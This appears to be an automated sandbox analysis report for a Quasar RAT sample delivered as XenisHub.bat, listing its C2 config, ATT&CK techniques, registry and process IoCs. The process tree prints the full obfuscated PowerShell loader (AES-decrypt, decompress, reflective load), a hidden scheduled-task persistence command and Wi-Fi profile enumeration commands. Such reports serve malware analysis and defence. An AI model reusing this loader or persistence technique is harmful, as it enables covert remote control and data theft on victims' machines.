quasar | 918a07427a6aa97d1f0480a654547fcaf7185228c6bc41d88b19dd740cf4d036

Analysis

max time kernel
81s
max time network
84s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
20-05-2024 10:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XenisHub.bat
Size

1.7MB
MD5

a86b86c2e7182356c6149674ddc26848
SHA1

322292824444ca6a442f881498baac17506eea34
SHA256

918a07427a6aa97d1f0480a654547fcaf7185228c6bc41d88b19dd740cf4d036
SHA512

2111dd5b4b2ab69980ec8b8a851c2ca29aa97a14585535ff2af1b70432f741126578db5f6c50f8cd3623a7f6a27a8fb4ef8275a536b67415abba24dec7f5e3a9
SSDEEP

24576:2b0CZMqoDtzIt2Ipwh+o4w8VV3fgRihOuReKlOX1+ZfHR9QaAHfimfoK6+nZq:2PcY2lMtYXQZg2

Score

10^/10

quasar slave collection execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.0.0

Botnet

SLAVE

193.34.77.188:6969

Mutex

709ae576-840d-4df5-9c14-3fb7e062cf25

Attributes

encryption_key
8B3D2D2549599D0ED109F63D47FFC788BAA34A06
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Ruthless Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3876-51-0x000001C15C810000-0x000001C15CB2E000-memory.dmp	family_quasar
behavioral1/memory/3876-63-0x000001C15CCC0000-0x000001C15CCD8000-memory.dmp	family_quasar

Blocklisted process makes network request 8 IoCs

Processes:

powershell.exe

flow	pid	process
26	3876	powershell.exe
27	3876	powershell.exe
30	3876	powershell.exe
55	3876	powershell.exe
151	3876	powershell.exe
152	3876	powershell.exe
51	3876	powershell.exe
54	3876	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

3020 powershell.exe
3876 powershell.exe
1072 powershell.exe

pid	process
3020	powershell.exe
3876	powershell.exe
1072	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

powershell.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

50 ip-api.com
Drops file in Windows directory 1 IoCs

Processes:

LogonUI.exe

description ioc process

File created C:\Windows\rescache\_merged\2229298842\2486942175.pri LogonUI.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
50	ip-api.com

description	ioc	process
File created	C:\Windows\rescache\_merged\2229298842\2486942175.pri	LogonUI.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	powershell.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exechrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 18 IoCs

Processes:

LogonUI.exechrome.exechrome.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "118"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133606755824887303"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

Processes:

powershell.exepowershell.exepowershell.exechrome.exechrome.exe

pid	process
1072	powershell.exe
1072	powershell.exe
3020	powershell.exe
3020	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
2136	chrome.exe
2136	chrome.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
5588	chrome.exe
5588	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

Processes:

chrome.exechrome.exe

pid process

2136 chrome.exe
2136 chrome.exe
2136 chrome.exe
2136 chrome.exe
2136 chrome.exe
2136 chrome.exe
5588 chrome.exe
5588 chrome.exe
5588 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeIncreaseQuotaPrivilege	3020	powershell.exe
Token: SeSecurityPrivilege	3020	powershell.exe
Token: SeTakeOwnershipPrivilege	3020	powershell.exe
Token: SeLoadDriverPrivilege	3020	powershell.exe
Token: SeSystemProfilePrivilege	3020	powershell.exe
Token: SeSystemtimePrivilege	3020	powershell.exe
Token: SeProfSingleProcessPrivilege	3020	powershell.exe
Token: SeIncBasePriorityPrivilege	3020	powershell.exe
Token: SeCreatePagefilePrivilege	3020	powershell.exe
Token: SeBackupPrivilege	3020	powershell.exe
Token: SeRestorePrivilege	3020	powershell.exe
Token: SeShutdownPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeSystemEnvironmentPrivilege	3020	powershell.exe
Token: SeRemoteShutdownPrivilege	3020	powershell.exe
Token: SeUndockPrivilege	3020	powershell.exe
Token: SeManageVolumePrivilege	3020	powershell.exe
Token: 33	3020	powershell.exe
Token: 34	3020	powershell.exe
Token: 35	3020	powershell.exe
Token: 36	3020	powershell.exe
Token: SeIncreaseQuotaPrivilege	3020	powershell.exe
Token: SeSecurityPrivilege	3020	powershell.exe
Token: SeTakeOwnershipPrivilege	3020	powershell.exe
Token: SeLoadDriverPrivilege	3020	powershell.exe
Token: SeSystemProfilePrivilege	3020	powershell.exe
Token: SeSystemtimePrivilege	3020	powershell.exe
Token: SeProfSingleProcessPrivilege	3020	powershell.exe
Token: SeIncBasePriorityPrivilege	3020	powershell.exe
Token: SeCreatePagefilePrivilege	3020	powershell.exe
Token: SeBackupPrivilege	3020	powershell.exe
Token: SeRestorePrivilege	3020	powershell.exe
Token: SeShutdownPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeSystemEnvironmentPrivilege	3020	powershell.exe
Token: SeRemoteShutdownPrivilege	3020	powershell.exe
Token: SeUndockPrivilege	3020	powershell.exe
Token: SeManageVolumePrivilege	3020	powershell.exe
Token: 33	3020	powershell.exe
Token: 34	3020	powershell.exe
Token: 35	3020	powershell.exe
Token: 36	3020	powershell.exe
Token: SeIncreaseQuotaPrivilege	3020	powershell.exe
Token: SeSecurityPrivilege	3020	powershell.exe
Token: SeTakeOwnershipPrivilege	3020	powershell.exe
Token: SeLoadDriverPrivilege	3020	powershell.exe
Token: SeSystemProfilePrivilege	3020	powershell.exe
Token: SeSystemtimePrivilege	3020	powershell.exe
Token: SeProfSingleProcessPrivilege	3020	powershell.exe
Token: SeIncBasePriorityPrivilege	3020	powershell.exe
Token: SeCreatePagefilePrivilege	3020	powershell.exe
Token: SeBackupPrivilege	3020	powershell.exe
Token: SeRestorePrivilege	3020	powershell.exe
Token: SeShutdownPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeSystemEnvironmentPrivilege	3020	powershell.exe
Token: SeRemoteShutdownPrivilege	3020	powershell.exe
Token: SeUndockPrivilege	3020	powershell.exe
Token: SeManageVolumePrivilege	3020	powershell.exe
Token: 33	3020	powershell.exe
Token: 34	3020	powershell.exe
Token: 35	3020	powershell.exe

Suspicious use of FindShellTrayWindow 53 IoCs

Processes:

chrome.exechrome.exe

pid	process
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe

Suspicious use of SendNotifyMessage 48 IoCs

Processes:

chrome.exechrome.exe

pid	process
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
2136	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

LogonUI.exe

pid process

5404 LogonUI.exe
5404 LogonUI.exe

pid	process
5404	LogonUI.exe
5404	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exechrome.exe

description	pid	process	target process
PID 3024 wrote to memory of 3572	3024	cmd.exe	cmd.exe
PID 3024 wrote to memory of 3572	3024	cmd.exe	cmd.exe
PID 3024 wrote to memory of 1072	3024	cmd.exe	powershell.exe
PID 3024 wrote to memory of 1072	3024	cmd.exe	powershell.exe
PID 1072 wrote to memory of 3020	1072	powershell.exe	powershell.exe
PID 1072 wrote to memory of 3020	1072	powershell.exe	powershell.exe
PID 1072 wrote to memory of 1052	1072	powershell.exe	WScript.exe
PID 1072 wrote to memory of 1052	1072	powershell.exe	WScript.exe
PID 1052 wrote to memory of 3600	1052	WScript.exe	cmd.exe
PID 1052 wrote to memory of 3600	1052	WScript.exe	cmd.exe
PID 3600 wrote to memory of 2928	3600	cmd.exe	cmd.exe
PID 3600 wrote to memory of 2928	3600	cmd.exe	cmd.exe
PID 3600 wrote to memory of 3876	3600	cmd.exe	powershell.exe
PID 3600 wrote to memory of 3876	3600	cmd.exe	powershell.exe
PID 2136 wrote to memory of 4376	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 4376	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 1812	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 448	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 448	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 4980	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 4980	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 4980	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 4980	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 4980	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 4980	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 4980	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 4980	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 4980	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 4980	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 4980	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 4980	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 4980	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 4980	2136	chrome.exe	chrome.exe
PID 2136 wrote to memory of 4980	2136	chrome.exe	chrome.exe

outlook_office_path 1 IoCs

Processes:

powershell.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe

outlook_win_path 1 IoCs

Processes:

powershell.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XenisHub.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9m3LhdOOnbkpLgZfroZHKVACZM4EdssbtTG9kf35G7Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yeVfqudPUXOzBrMZY66Pgw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZuJwS=New-Object System.IO.MemoryStream(,$param_var); $hPqAb=New-Object System.IO.MemoryStream; $FTAcz=New-Object System.IO.Compression.GZipStream($ZuJwS, [IO.Compression.CompressionMode]::Decompress); $FTAcz.CopyTo($hPqAb); $FTAcz.Dispose(); $ZuJwS.Dispose(); $hPqAb.Dispose(); $hPqAb.ToArray();}function execute_function($param_var,$param2_var){ $zhvpZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bcvld=$zhvpZ.EntryPoint; $bcvld.Invoke($null, $param2_var);}$SGqmR = 'C:\Users\Admin\AppData\Local\Temp\XenisHub.bat';$host.UI.RawUI.WindowTitle = $SGqmR;$nsoKu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SGqmR).Split([Environment]::NewLine);foreach ($hvwJs in $nsoKu) { if ($hvwJs.StartsWith('qirvjfQbdGhMEGUUPoFU')) { $bTfWK=$hvwJs.Substring(20); break; }}$payloads_var=[string[]]$bTfWK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
2⤵
PID:3572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_157_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_157.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3020

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_157.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_157.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9m3LhdOOnbkpLgZfroZHKVACZM4EdssbtTG9kf35G7Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yeVfqudPUXOzBrMZY66Pgw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZuJwS=New-Object System.IO.MemoryStream(,$param_var); $hPqAb=New-Object System.IO.MemoryStream; $FTAcz=New-Object System.IO.Compression.GZipStream($ZuJwS, [IO.Compression.CompressionMode]::Decompress); $FTAcz.CopyTo($hPqAb); $FTAcz.Dispose(); $ZuJwS.Dispose(); $hPqAb.Dispose(); $hPqAb.ToArray();}function execute_function($param_var,$param2_var){ $zhvpZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bcvld=$zhvpZ.EntryPoint; $bcvld.Invoke($null, $param2_var);}$SGqmR = 'C:\Users\Admin\AppData\Roaming\Windows_Log_157.bat';$host.UI.RawUI.WindowTitle = $SGqmR;$nsoKu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SGqmR).Split([Environment]::NewLine);foreach ($hvwJs in $nsoKu) { if ($hvwJs.StartsWith('qirvjfQbdGhMEGUUPoFU')) { $bTfWK=$hvwJs.Substring(20); break; }}$payloads_var=[string[]]$bTfWK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
5⤵
PID:2928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
PID:3876

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
6⤵
PID:5132

C:\Windows\system32\chcp.com
chcp 65001
7⤵
PID:5248

C:\Windows\system32\netsh.exe
netsh wlan show profile
7⤵
PID:5320

C:\Windows\system32\findstr.exe
findstr All
7⤵
PID:5332

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
6⤵
PID:5656

C:\Windows\system32\chcp.com
chcp 65001
7⤵
PID:5716

C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
7⤵
PID:5728

C:\Windows\System32\shutdown.exe
"C:\Windows\System32\shutdown.exe" /s /t 0
6⤵
PID:5864

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcd06fab58,0x7ffcd06fab68,0x7ffcd06fab78
2⤵
PID:4376

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1720 --field-trial-handle=1956,i,14781692798490434250,519466514117317174,131072 /prefetch:2
2⤵
PID:1812

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1956,i,14781692798490434250,519466514117317174,131072 /prefetch:8
2⤵
PID:448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2284 --field-trial-handle=1956,i,14781692798490434250,519466514117317174,131072 /prefetch:8
2⤵
PID:4980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3036 --field-trial-handle=1956,i,14781692798490434250,519466514117317174,131072 /prefetch:1
2⤵
PID:740

C:\Program Files\Google\Chrome\Application\chrome.exe
